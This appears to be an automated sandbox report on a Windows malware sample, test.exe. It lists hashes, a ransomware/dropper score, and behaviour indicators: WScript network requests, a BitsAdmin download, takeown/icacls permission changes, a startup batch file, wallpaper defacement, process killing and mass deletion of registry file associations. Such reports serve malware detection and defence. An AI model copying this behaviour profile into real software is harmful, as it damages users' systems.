ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093

Analysis

max time kernel
78s
max time network
147s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
09-08-2024 00:53

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

test.exe
Size

187KB
MD5

758180c588bfffa96aa400d55513502f
SHA1

558e8ce1e7db1e04ab612390855052a6fcde25a4
SHA256

ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093
SHA512

d66210dc71ecafd017dbd63301f8072550670ee900d254bb2649e27a9c6ae69dcb86f8b9d1f35663fec979fa6f8dda4e6e49865744f72c4b17ef450ddb678f68
SSDEEP

3072:PV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnP9vg0UasVmkoYcMK/C:Ct5hBPi0BW69hd1MMdxPe9N9uA069TBE

Score

8^/10

discovery dropper exploit ransomware

Malware Config

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
6	1088	WScript.exe
7	1088	WScript.exe
10	2552	WScript.exe
11	2552	WScript.exe
12	2552	WScript.exe
15	2552	WScript.exe
17	2552	WScript.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2764	bitsadmin.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2828	takeown.exe
2796	icacls.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2828	takeown.exe
2796	icacls.exe

Enumerates connected drives 3 TTPs 47 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\D:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe

Sets desktop wallpaper using registry 2 TTPs 64 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\END_RE~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\STOP_C~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNOF~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE99D5~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RECDE7~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~3.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGTRA~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DEFAUL~1.PDF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~3.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ENDED_~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SUBMIS~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNON~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\atl.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icucnv36.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LOGTRA~1.EXE	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\DISTRI~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMPRO~1.CER	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\OPEN_O~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ADD_RE~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\RE78D9~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSIG~1.PDF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\STANDA~1.PDF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORMS_~3.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CRYPTO~1.SIG	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MYRIAD~1.OTF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FORM_R~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\IDENTI~1	cmd.exe
File opened for modification	C:\Program Files\Java\jre7\bin\server\classes.jsa	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\LICENS~1.HTM	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\CREATE~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\SERVER~2.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\TURNOF~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEL~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ADOBEU~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPU~1.INI	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SH~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\EMAIL_~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\REVIEW~1.GIF	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CCME_B~1.DLL	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2464	timeout.exe
640	timeout.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
1064	taskkill.exe
2348	taskkill.exe
2096	taskkill.exe
2152	taskkill.exe
3028	taskkill.exe
1336	taskkill.exe
2004	taskkill.exe
2276	taskkill.exe
2684	taskkill.exe
2832	taskkill.exe
2868	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.DVR-MS\OpenWithList\ehshell.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.eprtx\OpenWithProgIds	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hxc\OpenWithProgids\Shared	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hxq\OpenWithProgids	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.bas\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.bmp\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.m4b	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mad\Access.Shortcut.Module.1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.adp\Access.Project.14\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.api	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.contact\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.cs	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.etp\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.maf	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\PropertySheetHandlers\{883373C3-BF89-11D1-BE35-080036B11A03}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.docxml	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.exp\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.dwfx\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hxw\OpenWithProgids\Shared	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.accdt\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.dotm	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.au	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.com\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.jpe\OpenWithList	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.maf\Access.Shortcut.Form.1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.exc	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.bin\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.dotm\Word.TemplateMacroEnabled.12	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.gif	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.accdw	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.aif	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.api\AcroExch.Plugin\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.asm	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.3gp\ShellEx\{BB2E617C-0920-11D1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.M2V\ShellEx\{BB2E617C-0920-11D1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.amr	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.cpl\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.docm\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.H1W	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.accdc\Access.ACCDCFile.14	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.accde\Access.ACCDEFile.14\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.b4s	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.cab	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.disco\OpenWithProgids	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.emf	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.a	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.jbf\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.emf\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\OpenWithList\Excel.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\OpenWithList\MSPaint.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.dotx\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\Config	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.datasource\OpenWithList	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.hol	reg.exe
